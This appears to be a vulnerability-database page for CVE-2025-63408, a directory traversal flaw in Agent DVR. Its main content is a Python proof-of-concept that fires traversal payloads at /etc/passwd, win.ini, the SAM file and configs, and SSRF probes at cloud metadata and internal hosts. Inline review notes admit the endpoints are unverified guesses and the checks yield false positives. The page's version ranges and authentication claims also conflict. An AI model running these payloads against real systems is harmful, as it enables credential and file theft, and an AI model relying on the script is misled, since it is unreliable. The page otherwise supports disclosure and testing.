Security Vulnerability Report
CVE-2025-63408 CVSS 7.8 HIGH

CVE-2025-63408

Published: 2025-11-18 16:15:45
Last Modified: 2025-12-31 02:25:55

Description

Local Agent DVR versions through 6.6.1.0 are vulnerable to directory traversal that allows an unauthenticated local attacker to gain access to sensitive information, cause server-side request forgery (SSRF), or execute OS commands.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ispyconnect:agent_dvr:*:*:*:*:*:*:*:* - VULNERABLE
Local Agent DVR < 6.6.1.0
Local Agent DVR 6.6.1.0 (及所有更早版本)
所有支持平台版本(Windows/Linux/macOS)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63408 PoC - Local Agent DVR Directory Traversal
# Vulnerability: Unauthenticated directory traversal in Local Agent DVR <= 6.6.1.0
# CVSS 7.8 (High) - Local attack vector with low privileges required
#
# NOTE(review): the header says "unauthenticated" but also "low privileges
# required"; the primary CVSS vector quoted on this page is PR:L, so the two
# statements do not agree -- confirm against the advisory before relying on
# either.
# NOTE(review): `requests` is a third-party dependency; `sys` is imported but
# never used in this script.
import requests
import urllib.parse
import sys

# Base URL of the instance under test. Placeholder hostname; every request
# below is built by string-concatenating a path onto this value.
TARGET_HOST = "http://target-agent-dvr.local"


def test_directory_traversal() -> bool:
    """Test for directory traversal vulnerability in Local Agent DVR.

    Sends a fixed list of candidate paths to TARGET_HOST and inspects the
    responses. Returns True as soon as one of the hard-coded endpoint probes
    returns HTTP 200 with a body containing one of three marker strings;
    otherwise runs the generic probes and returns False. All results are
    reported via print(); nothing is logged or persisted.

    NOTE(review): none of the endpoints or file paths below is verified
    anywhere on this page against the Agent DVR API; treat them as unverified
    guesses, not as the vulnerable route described in the advisory.
    """
    # Common sensitive files to check on Linux systems
    # NOTE(review): the backslash-separated literals below use sequences such
    # as `\e`, `\p`, `\w` that are not valid Python escapes. CPython keeps the
    # backslash verbatim but emits a DeprecationWarning/SyntaxWarning; raw
    # strings (r"...") would make the intent explicit.
    linux_files = [
        "../../../../etc/passwd",
        "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
        "....//....//....//....//etc/passwd",
        "..\..\..\..\etc\passwd",
        "..%5C..%5C..%5C..%5Cetc%5Cpasswd"
    ]
    # Common sensitive files for Windows systems
    windows_files = [
        "..\..\..\..\windows\win.ini",
        "..%5C..%5C..%5C..%5Cwindows%5Cwin.ini",
        "..\..\..\..\Windows\System32\drivers\etc\hosts",
        "..\..\..\..\ProgramData\Application Data\*",
        "..\..\..\..\inetpub\wwwroot\web.config"
    ]
    print(f"[*] Testing Local Agent DVR directory traversal vulnerability")
    print(f"[*] Target: {TARGET_HOST}")
    print("-" * 60)
    # Test Agent DVR specific paths
    # NOTE(review): these routes are not shown to exist on this page; the
    # "[403, 404]" branch below will simply report "not found" for any route
    # the server does not serve, which is not evidence of a fix.
    agent_dvr_paths = [
        "/api/files?path=../../../../etc/passwd",
        "/files/..%2F..%2F..%2F..%2Fetc/passwd",
        "/download?file=../../../../etc/passwd",
        "/storage/..%2F..%2F..%2F..%2Fconfig/agent.config",
        "/logs/..\..\..\..\windows\System32\config\sam"
    ]
    for path in agent_dvr_paths:
        try:
            url = f"{TARGET_HOST}{path}"
            print(f"[*] Testing: {url}")
            # verify=False disables TLS certificate validation for this
            # request (irrelevant for the plain-http default TARGET_HOST, but
            # it silently accepts any certificate if an https URL is used).
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200:
                content = response.text
                # Marker strings: "root:" (passwd-style file), "[extensions]"
                # (win.ini) and "<?xml" (an XML config). A 200 without any of
                # them is treated as not vulnerable and is not reported.
                if "root:" in content or "[extensions]" in content or "<?xml" in content:
                    print(f"[+] VULNERABLE! Successfully accessed: {path}")
                    # Only the first 500 characters are echoed.
                    print(f"[+] Content preview:\n{content[:500]}")
                    return True
            elif response.status_code in [403, 404]:
                print(f"[-] Access blocked or not found: {path}")
            else:
                print(f"[*] Status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error testing {path}: {e}")
    # Also try basic traversal
    # Each candidate is percent-encoded with urllib.parse.quote before being
    # appended, so already-encoded entries ("%2F", "%5C") are double-encoded.
    # A 200 with any non-empty body is reported as "potential access" with no
    # content check, so this loop can produce false positives.
    for traversal in linux_files + windows_files:
        try:
            encoded = urllib.parse.quote(traversal)
            url = f"{TARGET_HOST}/files/{encoded}"
            print(f"[*] Testing basic traversal: {encoded}")
            response = requests.get(url, timeout=10, verify=False)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] Potential access via: {traversal}")
        except Exception as e:
            # Broad catch: any failure is printed and the loop continues.
            print(f"[!] Error: {e}")
    print("-" * 60)
    print("[*] Testing complete. If vulnerable, sensitive files may be exposed.")
    print("[*] Next steps: Check for SSRF or RCE via command injection paths")
    return False


def test_ssrf() -> None:
    """Test for SSRF via directory traversal.

    Issues one GET per hard-coded candidate URL and prints the status code.
    The status code alone is printed; no response body is inspected, so this
    function does not actually establish whether a server-side request was
    made. Returns nothing.

    NOTE(review): as above, these routes are not verified against the Agent
    DVR API anywhere on this page.
    """
    ssrf_targets = [
        "/api/http?url=http://localhost:22",
        "/api/fetch?target=http://169.254.169.254/latest/meta-data/",
        "/proxy/..%2F..%2Fhttp://internal-server/admin"
    ]
    print("\n[*] Testing SSRF via traversal...")
    for target in ssrf_targets:
        try:
            url = f"{TARGET_HOST}{target}"
            response = requests.get(url, timeout=10, verify=False)
            print(f"[*] SSRF test: {target} - Status: {response.status_code}")
        except:
            # Bare except: swallows every exception, including
            # KeyboardInterrupt and SystemExit, and reports nothing. A
            # connection error here is indistinguishable from a clean run.
            pass


if __name__ == "__main__":
    # Runs both probes unconditionally; the return value of
    # test_directory_traversal() is discarded, so the exit status is always 0.
    test_directory_traversal()
    test_ssrf()
    print("\n[!] Note: This PoC is for authorized security testing only!")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63408", "sourceIdentifier": "[email protected]", "published": "2025-11-18T16:15:45.323", "lastModified": "2025-12-31T02:25:54.523", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local Agent DVR versions thru 6.6.1.0 are vulnerable to directory traversal that allows an unauthenticated local attacker to gain access to sensitive information, cause a server-side forgery request (SSRF), or execute OS commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ispyconnect:agent_dvr:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.6.7.0", "matchCriteriaId": "7476F171-5953-4AF8-98B3-C6C3CC11FD58"}]}]}], 
"references": [{"url": "https://ispysoftware.github.io/Agent_API/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.ericholub.com/blog/agent-dvr-rce/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}